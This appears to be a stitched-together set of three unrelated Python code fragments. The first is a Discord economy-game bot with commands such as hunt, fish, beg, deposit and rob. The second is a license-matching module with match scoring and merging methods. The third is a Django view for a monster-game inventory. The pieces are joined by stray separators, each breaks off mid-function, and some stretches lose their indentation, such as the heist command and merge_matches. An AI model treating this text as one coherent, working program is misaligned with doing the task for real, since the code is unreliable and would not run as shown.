        data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Hunting Rifle', 'id': 'rifle', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 2}]
        data["wallet"] = 0
        data["bank"] = 0
        data["banklimit"] = 100000
        embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nRifle x1\nBasic Lootbox x2\n\nStarter Bank Space: 100k")
    else:
        data["bag"] = [{'name': 'Laptop', 'id': 'laptop', 'amount': 1}, {'name': 'Fishing Pole', 'id': 'fishingpole', 'amount': 1}, {'name': 'Hunting Rifle', 'id': 'rifle', 'amount': 1}, {'name': 'Phone', 'id': 'phone', 'amount': 1}, {'name': 'Basic Lootbox', 'id': 'lootbox', 'amount': 2}]
        data["wallet"] = 0
        data["bank"] = 0
        data["banklimit"] = 150000
        embed.add_field(name="Rewards", value="Laptop x1\nFishing Pole x1\nRifle x1\nPhone x1\nBasic Lootbox x2\n\nStarter Bank Space: 150k")
    await ctx.send(embed=embed)
    await self.upsert(data)
@commands.command(description="Go hunting for some wild animals")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def hunt(self, ctx):
    """Fire the hunting rifle at a random animal; roughly a 71% success chance."""
    await self.check_acc(ctx.author)
    res = await self.check_for(ctx.author, "rifle")
    if not res[0] and res[1] == 2:
        return await ctx.send("You do not have a hunting rifle!")
    quarry = random.choice(["skunk", "cow", "rabbit", "bear"])
    roll = random.randrange(0, 100)
    if roll < 71:
        await self.add_item(ctx.author, quarry, 1)
        await ctx.send("You fired your rifle and caught a {}".format(quarry))
    else:
        await ctx.send("You fired your rifle and the animal got away.")
@commands.command(description="Go fishing with your old man")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def fish(self, ctx):
    """Catch one or two fish and add them to the player's inventory."""
    await self.check_acc(ctx.author)
    res = await self.check_for(ctx.author, "fishingpole")
    if not res[0] and res[1] == 2:
        return await ctx.send("You do not have a fishing pole!")
    caught = random.randrange(1, 3)
    await self.add_item(ctx.author, "fish", caught)
    await ctx.send("You have caught {} fish".format(caught))
@commands.command(aliases=["scout"], description="Look for coins around the world")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def search(self, ctx):
    """Show the interactive location picker used to search for coins."""
    await self.check_acc(ctx.author)
    # record fetch kept for parity with the original flow; the value is unused here
    _record = await self.bc.economy.find(ctx.author.id)
    prompt = "**Where do you want to search?**\nPick one of the options below to search"
    await ctx.send(prompt, view=Search(self.bc, ctx))
@commands.command(description="Beg for coins.")
@commands.check(custom_cooldown(1,30,1,12,BucketType.user))
async def beg(self, ctx):
    """Grant 0-800 coins from a random donor and announce who donated."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    # randint is inclusive on both ends: earnings are 0..800
    earnings = random.randint(0, 800)
    # BUG FIX: the previous range(0,200)/range(201,400)/... checks skipped the
    # exact boundary values 200, 400, 600 and 800, so those rolls paid out with
    # no message at all; an inclusive if/elif chain covers every value
    if earnings <= 200:
        await ctx.send("**Some guy** donated {}".format(earnings))
    elif earnings <= 400:
        await ctx.send("**<NAME>** donated {}".format(earnings))
    elif earnings <= 600:
        await ctx.send("**<NAME>** donated {}".format(earnings))
    else:
        await ctx.send("**BongoPlayzYT** donated {}".format(earnings))
    data["wallet"] += earnings
    await self.upsert(data)
@commands.command(aliases=["with"], description="Take some money out of your bank")
async def withdraw(self, ctx, amount):
    """Move `amount` coins (or "all"/"half") from the bank into the wallet."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    if amount == "all":
        amount = data["bank"]
    if amount == "half":
        amount = data["bank"] / 2
    # discord passes arguments as strings; "half" may also yield a float
    amount = int(amount)
    # BUG FIX: deposit rejects negative amounts but withdraw did not, so a
    # negative withdrawal could push coins into the bank past its limit
    if amount < 0:
        return await ctx.send("Amount must be positive")
    if amount > data["bank"]:
        return await ctx.send("You dont have that much money in your bank!")
    data["wallet"] += amount
    data["bank"] -= amount
    await self.upsert(data)
    await ctx.send("Successfully withdrew **{}** coins from your bank!".format(amount))
@commands.command(aliases=["dep"], description="Put some money into your bank")
async def deposit(self, ctx, amount):
    """Move `amount` coins (or "all"/"half") from the wallet into the bank,
    respecting the bank limit. An "all" deposit is capped at the remaining space."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    if amount == "all":
        amount = data["wallet"]
        # cap an all-in deposit at the remaining bank space
        space_left = data["banklimit"] - data["bank"]
        if amount > space_left:
            amount = space_left
    elif amount == "half":
        amount = data["wallet"] / 2
    # BUG FIX: the space check `amount + data["bank"]` previously ran BEFORE
    # amount was converted from its string form, so any numeric or "half"
    # deposit raised TypeError; convert first, then validate
    amount = int(amount)
    if amount > data["wallet"]:
        await ctx.send("You dont have that much money!")
        return
    if amount < 0:
        await ctx.send("Amount must be positive")
        return
    if amount + data["bank"] > data["banklimit"]:
        await ctx.send("You dont have enough space in your bank!")
        return
    data["bank"] += amount
    data["wallet"] -= amount
    await self.upsert(data)
    await ctx.send("Successfully deposited **{}** coins!".format(amount))
@commands.command(description="Check out the top 10 global richest people using this bot")
async def rich(self, ctx):
    """Show an embed of the ten users holding the most wallet coins."""
    records = await self.bc.economy.get_all()
    richest = sorted(records, key=lambda record: record["wallet"], reverse=True)
    em = discord.Embed(
        title="Top 10 Global Users With the most amount of money in their wallet"
    )
    for rank, record in enumerate(richest[:10], start=1):
        em.add_field(
            name=f"{rank}. {self.bc.get_user(record['_id'])}",
            value=f"{record['wallet']}",
            inline=False,
        )
    await ctx.send(embed=em)
@commands.command(description="Buy an item from the shop")
async def buy(self, ctx, item, amount=1):
    """Purchase `amount` of `item` from the shop, reporting any failure reason."""
    await self.check_acc(ctx.author)
    res = await self.buy_item(ctx.author, item, amount)
    if not res[0]:
        failure_messages = {
            1: "That item was not found!",
            2: "This item cannot be bought!",
            3: "You don't have enough money in your wallet for this!",
        }
        message = failure_messages.get(res[1])
        if message is not None:
            return await ctx.send(message)
    await ctx.send("Item Bought Successfully!")
@commands.command(description="Sell an item for 1/3 of its price")
async def sell(self, ctx, item, amount=1):
    """Sell `amount` of `item` and report the payout (one third of shop price)."""
    await self.check_acc(ctx.author)
    res = await self.sell_item(ctx.author, item, amount)
    if not res[0]:
        if res[1] == 1:
            return await ctx.send("That item was not found!")
        if res[1] == 2:
            return await ctx.send("You don't have that much of that item to sell!")
    item_name = item.lower()
    # look the item up in the shop to compute the payout: exact id match
    # first, substring match as a fallback (the original shadowed `item`
    # with its loop variable; `entry` avoids that)
    entry = next((shop_item for shop_item in shop if item_name == shop_item["id"]), None)
    if not entry:
        entry = next((shop_item for shop_item in shop if item_name in shop_item["id"]), None)
    if not entry:
        return await ctx.send("I could not find that item in the shop! Please check your spelling!")
    await ctx.send("Item Sold Successfully for {} coins!".format(int(entry["cost"] / 3)))
@commands.command(aliases=["inv"], description="Check out what items you have in your inventory")
async def inventory(self, ctx, member: discord.Member = None):
    """Show a member's item bag; defaults to the invoking user."""
    member = member or ctx.author
    await self.check_acc(member)
    record = await self.bc.economy.find(member.id)
    embed = discord.Embed(
        title="{}'s inventory".format(member.name),
        color=random.choice(self.bc.color_list)
    )
    if not record["bag"]:
        embed.add_field(name="This inventory is empty!", value="Use the shop command to get some items!")
    else:
        for entry in record["bag"]:
            embed.add_field(name=f"{entry['name']} ─ {entry['amount']:,d}", value="ID: `{}`".format(entry["id"]), inline=False)
    await ctx.send(embed=embed)
@commands.command(description="Turn this on so no one can rob you")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def passive(self, ctx):
    """Toggle the caller's passive (rob-protection) flag."""
    await self.check_acc(ctx.author)
    record = await self.bc.economy.find(ctx.author.id)
    record["passive"] = not record["passive"]
    state = "enabled" if record["passive"] else "disabled"
    await ctx.send(f"Your passive mode is now {state}")
    await self.upsert(record)
@commands.command(description="rob a person")
@commands.check(custom_cooldown(1,45,1,20,BucketType.user))
async def rob(self, ctx, member: discord.Member):
    """Steal a random amount of coins from another member's wallet."""
    await self.check_acc(ctx.author)
    data = await self.bc.economy.find(ctx.author.id)
    await self.check_acc(member)
    data2 = await self.bc.economy.find(member.id)
    # Check passive flags BEFORE rolling the theft amount; previously the
    # roll happened first, so a negative target wallet could crash
    # random.randint even when the rob would have been rejected.
    if data2["passive"]:
        await ctx.send(
            "This person is in passive mode leave him alone :(_ _")
        return
    if data["passive"]:
        await ctx.send(
            "Mate you are in passive mode so you cant rob someone"
        )
        return
    # Clamp at zero so a negative wallet can't crash randint.
    earnings = random.randint(0, max(data2["wallet"], 0))
    data["wallet"] += earnings
    data2["wallet"] -= earnings
    await ctx.send("You robbed this person and got {}".format(earnings))
    await self.upsert(data)
    await self.upsert(data2)
@commands.command(description="Share some coins and bring some joy :)")
async def share(self, ctx, member: discord.Member, amount: int):
    """Transfer `amount` coins from the caller's wallet to `member`."""
    if amount < 0:
        return await ctx.send("Amount must be a positive number")
    await self.check_acc(ctx.author)
    giver = await self.bc.economy.find(ctx.author.id)
    await self.check_acc(member)
    receiver = await self.bc.economy.find(member.id)
    # Same guard order as before: funds, then both passive flags.
    if amount > giver["wallet"]:
        return await ctx.send("You dont have that much money!")
    if giver["passive"]:
        return await ctx.send("You are in passive mode you have to turn that off to share coins!")
    if receiver["passive"]:
        return await ctx.send("This person has passive mode on so you cannot share coins to them!")
    giver["wallet"] -= amount
    receiver["wallet"] += amount
    await ctx.send("You have now shared **{}** to `{}`".format(amount, member))
    await self.upsert(giver)
    await self.upsert(receiver)
@commands.command(description="rob a person's bank", usage="<user>")
async def heist(self, ctx, member: discord.Member):
await self.check_acc(ctx.author)
| |
query contains stopwords between its start and end
in the query. Stopwords are never match by construction.
"""
# The query side of the match may not be contiguous and may contain
# unmatched stopword tokens.
query = self.query
qspan = self.qspan
# note: to avoid breaking many tests we check query presence
if query:
qspe = qspan.end
# Count stopword tokens that are inside the matched range, ignoring
# end position of the query span. This is used to check if there are
# stopwords inside an "only_known_words" match.
stopwords_pos = qspan & query.stopwords_span
stopwords_pos = (pos for pos in stopwords_pos if pos != qspe)
qry_stopxpos = query.stopwords_by_pos
return any(qry_stopxpos[pos] for pos in stopwords_pos)
def qrange(self):
    """
    Return the full extent of the matched query region: the span magnitude
    from this match's start to its end in the query, counting matched and
    unmatched positions but IGNORING unknown tokens.
    """
    span = self.qspan
    return span.magnitude()
def qdensity(self):
    """
    Return the query density of this match: the ratio of matched length to
    query magnitude, a float between 0 and 1. Contiguous matches have a
    density of one; sparse matches are lower; empty matches are zero.
    """
    matched = self.len()
    if not matched:
        return 0
    extent = self.qmagnitude()
    if not extent:
        return 0
    return matched / extent
def idensity(self):
    """
    Return the rule-side density of this match: the ratio of matched rule
    length to rule-side magnitude, a float between 0 and 1. All-contiguous
    matched rule tokens yield one; sparse matches yield less; an empty
    match yields zero.
    """
    rule_side_span = self.ispan
    return rule_side_span.density()
def score(self):
    """
    Return the score for this match as a rounded float between 0 and 100.

    The score indicates confidence that the match is good. It combines the
    matched token count, the extent of the matched query region (including
    unknown and unmatched tokens) and the matched rule relevance.
    """
    # relevance is stored as 0..100; normalize to 0..1.
    relevance = self.rule.relevance / 100
    if not relevance:
        return 0
    qmagnitude = self.qmagnitude()
    if not qmagnitude:
        return 0
    # FIXME: this should exposed as an q/icoverage() method instead
    query_coverage = self.len() / qmagnitude
    rule_coverage = self._icoverage()
    if query_coverage < 1 and rule_coverage < 1:
        # Both sides are partial: score on the rule side only.
        return round(rule_coverage * relevance * 100, 2)
    return round(query_coverage * rule_coverage * relevance * 100, 2)
def surround(self, other):
    """
    Return True if this match's query span surrounds the other match's
    query span.

    Unlike containment, a surrounding region may share no positions at all
    with the surrounded match.
    """
    starts_no_later = self.qstart <= other.qstart
    ends_no_earlier = self.qend >= other.qend
    return starts_no_later and ends_no_earlier
def is_after(self, other):
    """
    Return True if both the query span and the rule span of this match are
    strictly after the corresponding spans of the other match.
    """
    if not self.qspan.is_after(other.qspan):
        return False
    return self.ispan.is_after(other.ispan)
def combine(self, other):
    """
    Return a new match object combining self and an other match.

    Both matches must be for the same rule; raise TypeError otherwise. The
    combined match unions the query, rule and high-token spans and keeps
    the earliest query run start.
    """
    if self.rule != other.rule:
        # NOTE: the message interpolates the *local names* self/other via
        # locals(); do not rename these parameters.
        raise TypeError(
            'Cannot combine matches with different rules: '
            'from: %(self)r, to: %(other)r' % locals())
    # Concatenate matcher labels, unless other's label is already a
    # substring of self's.
    if other.matcher not in self.matcher:
        newmatcher = ' '.join([self.matcher, other.matcher])
    else:
        newmatcher = self.matcher
    combined = LicenseMatch(
        rule=self.rule,
        qspan=Span(self.qspan | other.qspan),
        ispan=Span(self.ispan | other.ispan),
        hispan=Span(self.hispan | other.hispan),
        query_run_start=min(self.query_run_start, other.query_run_start),
        matcher=newmatcher,
        query=self.query)
    return combined
def update(self, other):
    """
    Merge the other match into self in place and return the updated self.
    """
    merged = self.combine(other)
    self.qspan = merged.qspan
    self.ispan = merged.ispan
    self.hispan = merged.hispan
    self.matcher = merged.matcher
    self.query_run_start = min(self.query_run_start, other.query_run_start)
    return self
def is_small(self):
    """
    Return True if this match is "small" given its rule length thresholds.
    Small matches are treated as spurious and discarded.
    """
    rule = self.rule
    if TRACE_FILTER_SHORT:
        coverage = self.coverage()
        logger_debug(
            'LicenseMatch.is_small(): %(self)r' % locals(),)
    # Case 1: fewer matched tokens (total or high) than the rule requires.
    if self.len() < rule.min_matched_length or self.hilen() < rule.min_high_matched_length:
        if TRACE_FILTER_SHORT:
            logger_debug(' LicenseMatch.is_small(): CASE 1')
        return True
    # Case 2: an inherently small rule matched with poor coverage.
    if rule.is_small and self.coverage() < 80:
        if TRACE_FILTER_SHORT:
            logger_debug(' LicenseMatch.is_small(): CASE 2')
        return True
    if TRACE_FILTER_SHORT:
        logger_debug(' LicenseMatch.is_small(): not small')
    return False
def itokens(self, idx):
    """
    Yield the ids of the rule tokens matched by this match, in rule order.
    """
    rid = self.rule.rid
    if rid is None:
        return
    matched_positions = self.ispan
    for position, token_id in enumerate(idx.tids_by_rid[rid]):
        if position in matched_positions:
            yield token_id
def itokens_hash(self, idx):
    """
    Return a hash computed from the matched rule token ids, or None if
    there are no matched tokens.
    """
    from licensedcode.match_hash import index_hash
    token_ids = list(self.itokens(idx))
    return index_hash(token_ids) if token_ids else None
# FIXME: this should be done for all the matches found in a given scanned
# location at once to avoid reprocessing many times the original text
def matched_text(
    self,
    whole_lines=False,
    highlight=True,
    highlight_matched=u'%s',
    highlight_not_matched=u'[%s]',
    _usecache=True
):
    """
    Return the matched text for this match or an empty string if no query
    exists for this match.

    `whole_lines`: if True, render complete source lines rather than only
    the matched tokens (disabled automatically for long-line texts).
    `highlight_matched`/`highlight_not_matched`: format strings applied to
    matched and unmatched tokens respectively when `highlight` is True.
    `_usecache` can be set to False in testing to avoid any unwanted caching
    side effects as the caching depends on which index instance is being
    used and this index can change during testing.
    """
    query = self.query
    if not query:
        # TODO: should we raise an exception instead???
        # this case should never exist except for tests!
        return u''
    if whole_lines and query.has_long_lines:
        # Whole-line rendering is not usable on long-line (e.g. minified)
        # texts; fall back to token-level rendering.
        whole_lines = False
    # Delegate the actual text reconstruction, then strip trailing space.
    return u''.join(get_full_matched_text(
        self,
        location=query.location,
        query_string=query.query_string,
        idx=query.idx,
        whole_lines=whole_lines,
        highlight=highlight,
        highlight_matched=highlight_matched,
        highlight_not_matched=highlight_not_matched, _usecache=_usecache)
    ).rstrip()
def set_lines(matches, line_by_pos):
    """
    Update each match in the `matches` sequence with start and end line
    numbers taken from a `line_by_pos` {pos: line} mapping.
    """
    if not line_by_pos:
        # No mapping available: leave the line numbers at their defaults.
        return
    for match in matches:
        match.start_line = line_by_pos[match.qstart]
        match.end_line = line_by_pos[match.qend]
        if TRACE_SET_LINES:
            logger_debug('set_lines: match.start_line :', match.start_line)
            logger_debug('set_lines: match.end_line :', match.end_line)
def merge_matches(matches, max_dist=None):
"""
Merge matches to the same rule in a sequence of LicenseMatch matches. Return
a new list of merged matches if they can be merged. Match sequences that
cannot be merged are returned as-is. For being merged two matches must also
be in increasing query and index positions.
"""
# shortcut for single matches
if len(matches) < 2:
return matches
# only merge matches with the same rule: sort then group by rule for the
# same rule, sort on start, longer high, longer match, matcher type
sorter = lambda m: (m.rule.identifier, m.qspan.start, -m.hilen(), -m.len(), m.matcher)
matches.sort(key=sorter)
matches_by_rule = [(rid, list(rule_matches))
for rid, rule_matches in groupby(matches, key=lambda m: m.rule.identifier)]
if TRACE_MERGE: print('merge_matches: number of matches to process:', len(matches))
if max_dist is None:
max_dist = MAX_DIST
merged = []
for rid, rule_matches in matches_by_rule:
if TRACE_MERGE: logger_debug('merge_matches: processing rule:', rid)
rule_length = rule_matches[0].rule.length
# FIXME this is likely too much as we are getting gaps that are often too big
max_rule_side_dist = min((rule_length // 2) or 1, max_dist)
# compare two matches in the sorted sequence: current and next
i = 0
while i < len(rule_matches) - 1:
j = i + 1
while j < len(rule_matches):
current_match = rule_matches[i]
next_match = rule_matches[j]
if TRACE_MERGE: logger_debug('---> merge_matches: current:', current_match)
if TRACE_MERGE: logger_debug('---> merge_matches: next: ', next_match)
# two exact matches can never be merged as they will not be overlapping
# only sequence matches for the same rule can be merged
# if current_match.matcher != MATCH_SEQ and next_match.matcher != MATCH_SEQ:
# if TRACE_MERGE: logger_debug(' ---> ###merge_matches: both matches are EXACT_MATCHES, skipping')
# break
# FIXME: also considers the match length!
# stop if we exceed max dist
# or distance over 1/2 of rule length
if (current_match.qdistance_to(next_match) > max_rule_side_dist
or current_match.idistance_to(next_match) > max_rule_side_dist):
if TRACE_MERGE: | |
from collections import OrderedDict
import itertools
from operator import getitem
from crispy_forms.bootstrap import FieldWithButtons, StrictButton, Field, Div
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist, MultipleObjectsReturned
from django.db.models import Q, Count
from django.forms.models import modelformset_factory
from django.http import HttpResponseForbidden, JsonResponse, HttpResponse, HttpResponseBadRequest
from django.shortcuts import render, redirect, get_object_or_404
from django.template import loader
from django.template.context_processors import csrf
from django.urls import reverse
from bestiary.models import Monster, Building, Fusion, ESSENCE_MAP, GameItem
from herders.decorators import username_case_redirect
from herders.filters import MonsterInstanceFilter
from herders.forms import CompareMonstersForm, FilterMonsterInstanceForm, \
AddMonsterInstanceForm, BulkAddMonsterInstanceForm, \
BulkAddMonsterInstanceFormset, EditMonsterInstanceForm, PowerUpMonsterInstanceForm, AwakenMonsterInstanceForm, \
MonsterPieceForm
from herders.models import Summoner, MonsterInstance, MonsterPiece, MaterialStorage, MonsterShrineStorage, ArtifactInstance
from herders.views.compare import _compare_build_objects, _compare_monster_objects
DEFAULT_VIEW_MODE = 'box'
@username_case_redirect
def monsters(request, profile_name):
    """Render the monster inventory landing page for a profile."""
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return render(request, 'herders/profile/not_found.html')
    # Determine if the person logged in is the one requesting the view
    is_owner = request.user.is_authenticated and summoner.user == request.user
    if not (is_owner or summoner.public):
        return render(request, 'herders/profile/not_public.html')
    monster_filter_form = FilterMonsterInstanceForm(auto_id='id_filter_%s')
    monster_filter_form.helper.form_action = reverse('herders:monster_inventory', kwargs={'profile_name': profile_name})
    return render(request, 'herders/profile/monster_inventory/base.html', {
        'profile_name': profile_name,
        'summoner': summoner,
        'is_owner': is_owner,
        'monster_filter_form': monster_filter_form,
        'view': 'profile',
    })
@username_case_redirect
def monster_inventory(request, profile_name, view_mode=None, box_grouping=None):
    """Render a summoner's monster inventory.

    Supports view modes 'box' (default), 'list', 'pieces' and 'collection',
    and for the box view several grouping methods. When `view_mode` or
    `box_grouping` is passed in the URL it is stored in the session and a
    plain HttpResponse is returned so the client can re-request the page
    without the mode in the URL.
    """
    # If we passed in view mode or sort method, set the session variable and redirect back to ourself without the view mode or box grouping
    if view_mode:
        request.session['profile_view_mode'] = view_mode.lower()
    if box_grouping:
        request.session['profile_group_method'] = box_grouping.lower()
    if request.session.modified:
        return HttpResponse("Profile view mode cookie set")
    view_mode = request.session.get('profile_view_mode', DEFAULT_VIEW_MODE).lower()
    box_grouping = request.session.get('profile_group_method', 'grade').lower()
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return render(request, 'herders/profile/not_found.html')
    monster_queryset = MonsterInstance.objects.filter(owner=summoner).select_related(
        'monster',
        'monster__awakens_from',
        'monster__awakens_to',
    )
    total_monsters = monster_queryset.count()
    is_owner = (request.user.is_authenticated and summoner.user == request.user)
    if view_mode == 'list':
        # List view shows skills, runes, artifacts and teams: prefetch them.
        monster_queryset = monster_queryset.select_related(
            'monster__leader_skill',
            'monster__awakens_to',
            'default_build',
        ).prefetch_related(
            'monster__skills',
            'default_build__runes',
            'runes',
            'artifacts',
            'team_set',
            'team_leader',
            'tags'
        )
    elif view_mode == 'collection':
        monster_queryset = monster_queryset.prefetch_related(
            'monster__skills'
        )
    form = FilterMonsterInstanceForm(request.GET or None, auto_id='id_filter_%s')
    if form.is_valid():
        monster_filter = MonsterInstanceFilter(form.cleaned_data, queryset=monster_queryset)
    else:
        monster_filter = MonsterInstanceFilter(queryset=monster_queryset)
    filtered_count = monster_filter.qs.count()
    context = {
        'monsters': monster_filter.qs,
        'total_count': total_monsters,
        'filtered_count': filtered_count,
        'profile_name': profile_name,
        'is_owner': is_owner,
    }
    if is_owner or summoner.public:
        if view_mode == 'pieces':
            context['monster_pieces'] = MonsterPiece.objects.filter(owner=summoner).select_related('monster')
            template = 'herders/profile/monster_inventory/summoning_pieces.html'
        elif view_mode == 'list':
            template = 'herders/profile/monster_inventory/list.html'
        elif view_mode == 'collection':
            # Build, per skill group, ownership and skill-up progress for
            # every obtainable, unawakened, non-material base monster.
            monster_stable = {}
            # filters
            if form.is_valid():
                mon_name = form.cleaned_data['monster__name']
                filter_monster_name = (Q(name__icontains=mon_name)
                    | Q(awakens_from__name__icontains=mon_name)
                    | Q(awakens_from__awakens_from__name__icontains=mon_name)
                    | Q(awakens_to__name__icontains=mon_name))
                if form.cleaned_data['monster__natural_stars'] != "":
                    mon_stars = form.cleaned_data['monster__natural_stars'].split(',')
                    filter_nat_stars = (Q(natural_stars__gte=mon_stars[0]) & Q(natural_stars__lte=mon_stars[1]))
                else:
                    filter_nat_stars = None
            else:
                filter_monster_name = None
                filter_nat_stars = None
            material = (Q(archetype=Monster.ARCHETYPE_MATERIAL) | Q(archetype=Monster.ARCHETYPE_NONE))
            obtainable = Q(obtainable=True)
            unawakened = Q(awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED)
            base_material = (Q(monster__archetype=Monster.ARCHETYPE_MATERIAL) | Q(monster__archetype=Monster.ARCHETYPE_NONE))
            # NOTE(review): `awakened` is defined but never used below — confirm
            awakened = Q(monster__awaken_level=Monster.AWAKEN_LEVEL_AWAKENED)
            base_unawakened = Q(monster__awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED)
            base_monster_filters = obtainable & unawakened
            if filter_monster_name:
                base_monster_filters &= filter_monster_name
            if filter_nat_stars:
                base_monster_filters &= filter_nat_stars
            #
            base_monsters = Monster.objects.filter(base_monster_filters).exclude(material).order_by('skill_group_id', 'com2us_id').values('name', 'com2us_id', 'element', 'skill_group_id', 'skill_ups_to_max')
            # groupby requires the queryset ordered by skill_group_id (above).
            skill_groups = itertools.groupby(base_monsters, lambda mon: mon['skill_group_id'])
            for skill_group_id, records in skill_groups:
                if skill_group_id == -10000:
                    continue  # devilmon, somehow didn't get excluded
                records = list(records)
                data = {
                    'name': records[0]['name'],
                    'elements': {},
                    'possible_skillups': 0,
                    'skillups_need': 0,
                }
                elements = itertools.groupby(records, lambda mon: mon['element'])
                for element, records_element in elements:
                    records_element = list(records_element)
                    data['elements'][element] = {
                        'owned': False,
                        'skilled_up': False,
                        'skill_ups_to_max': None,
                        'skillups_max': records_element[0]['skill_ups_to_max'],
                    }
                    data['skillups_need'] += records_element[0]['skill_ups_to_max']
                monster_stable[skill_group_id] = data
            # Fold the summoner's own monsters into the per-element records.
            for mon in monster_filter.qs.exclude(base_material):
                mon_skill_group = monster_stable.get(mon.monster.skill_group_id)
                if not mon_skill_group:
                    continue  # if skill group doesnt exist, don't care
                data = monster_stable[mon.monster.skill_group_id]['elements'].get(mon.monster.element)
                if not data:
                    continue  # if base monster doesn't exist, continue (i.e. Varis)
                if data['skilled_up']:
                    continue  # don't care about other units, if at least one is already fully skilled up
                if not data['owned']:
                    data['owned'] = True
                skill_ups_to_max = mon.skill_ups_to_max()
                if not skill_ups_to_max:
                    # Fully skilled: this element no longer needs skill-ups.
                    data['skilled_up'] = True
                    monster_stable[mon.monster.skill_group_id]['skillups_need'] -= data['skillups_max']
                    continue
                if not data['skill_ups_to_max'] or skill_ups_to_max < data['skill_ups_to_max']:
                    # Keep the best (lowest) remaining skill-up count seen.
                    monster_stable[mon.monster.skill_group_id]['skillups_need'] -= data['skill_ups_to_max'] or data['skillups_max']
                    monster_stable[mon.monster.skill_group_id]['skillups_need'] += skill_ups_to_max
                    data['skill_ups_to_max'] = skill_ups_to_max
            # some other field than `monster__skill_group_id` is needed, so all records are saved, not only unique ones
            skill_up_mons = monster_filter.qs.filter(base_unawakened).exclude(base_material).values('id', 'monster__skill_group_id')
            for skill_group_id, records in itertools.groupby(skill_up_mons, lambda x: x['monster__skill_group_id']):
                r_c = len(list(records))
                monster_stable[skill_group_id]['possible_skillups'] += r_c
                monster_stable[skill_group_id]['skillups_need'] -= r_c
            # Monsters parked in the shrine also count as available fodder.
            for mss_item in MonsterShrineStorage.objects.select_related('item').filter(owner=summoner, item__awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED):
                skill_group_id = mss_item.item.skill_group_id
                if skill_group_id in monster_stable:
                    monster_stable[skill_group_id]['possible_skillups'] += mss_item.quantity
                    monster_stable[skill_group_id]['skillups_need'] -= mss_item.quantity
            monster_stable = sorted(monster_stable.values(), key=lambda x: x['name'])
            context['monster_stable'] = monster_stable
            template = 'herders/profile/monster_inventory/collection.html'
        else:
            # Group up the filtered monsters
            monster_stable = OrderedDict()
            if box_grouping == 'grade' or box_grouping == 'stars':
                for x in reversed(range(6)):
                    monster_stable[f'{x+1}*'] = monster_filter.qs.filter(stars=x+1).order_by('-level', 'monster__element', 'monster__name')
            elif box_grouping == 'natural_stars':
                for x in reversed(range(5)):
                    monster_stable[f'Natural {x+1}*'] = monster_filter.qs.filter(monster__natural_stars=x+1).order_by('-stars', '-level', 'monster__name')
            elif box_grouping == 'level':
                monster_stable['40'] = monster_filter.qs.filter(level=40).order_by('-level', '-stars', 'monster__element', 'monster__name')
                monster_stable['39-31'] = monster_filter.qs.filter(level__gt=30).filter(level__lt=40).order_by('-level', '-stars', 'monster__element', 'monster__name')
                monster_stable['30-21'] = monster_filter.qs.filter(level__gt=20).filter(level__lte=30).order_by( '-level', '-stars', 'monster__element', 'monster__name')
                monster_stable['20-11'] = monster_filter.qs.filter(level__gt=10).filter(level__lte=20).order_by( '-level', '-stars', 'monster__element', 'monster__name')
                monster_stable['10-1'] = monster_filter.qs.filter(level__lte=10).order_by('-level', '-stars', 'monster__element', 'monster__name')
            elif box_grouping == 'element' or box_grouping == 'attribute':
                monster_stable['water'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_WATER).order_by('-stars', '-level', 'monster__name')
                monster_stable['fire'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_FIRE).order_by('-stars', '-level', 'monster__name')
                monster_stable['wind'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_WIND).order_by('-stars', '-level', 'monster__name')
                monster_stable['light'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_LIGHT).order_by('-stars', '-level', 'monster__name')
                monster_stable['dark'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_DARK).order_by('-stars', '-level', 'monster__name')
            elif box_grouping == 'archetype':
                monster_stable['attack'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_ATTACK).order_by('-stars', '-level', 'monster__name')
                monster_stable['hp'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_HP).order_by('-stars', '-level', 'monster__name')
                monster_stable['support'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_SUPPORT).order_by('-stars', '-level', 'monster__name')
                monster_stable['defense'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_DEFENSE).order_by('-stars', '-level', 'monster__name')
                monster_stable['material'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_MATERIAL).order_by('-stars', '-level', 'monster__name')
                monster_stable['other'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_NONE).order_by('-stars', '-level', 'monster__name')
            elif box_grouping == 'priority':
                monster_stable['High'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_HIGH).order_by('-level', 'monster__element', 'monster__name')
                monster_stable['Medium'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_MED).order_by('-level', 'monster__element', 'monster__name')
                monster_stable['Low'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_LOW).order_by('-level', 'monster__element', 'monster__name')
                monster_stable['None'] = monster_filter.qs.select_related('monster').filter(owner=summoner).filter(Q(priority=None) | Q(priority=0)).order_by('-level', 'monster__element', 'monster__name')
            elif box_grouping == 'family':
                for mon in monster_filter.qs:
                    family_name = mon.monster.base_monster.name
                    if family_name not in monster_stable:
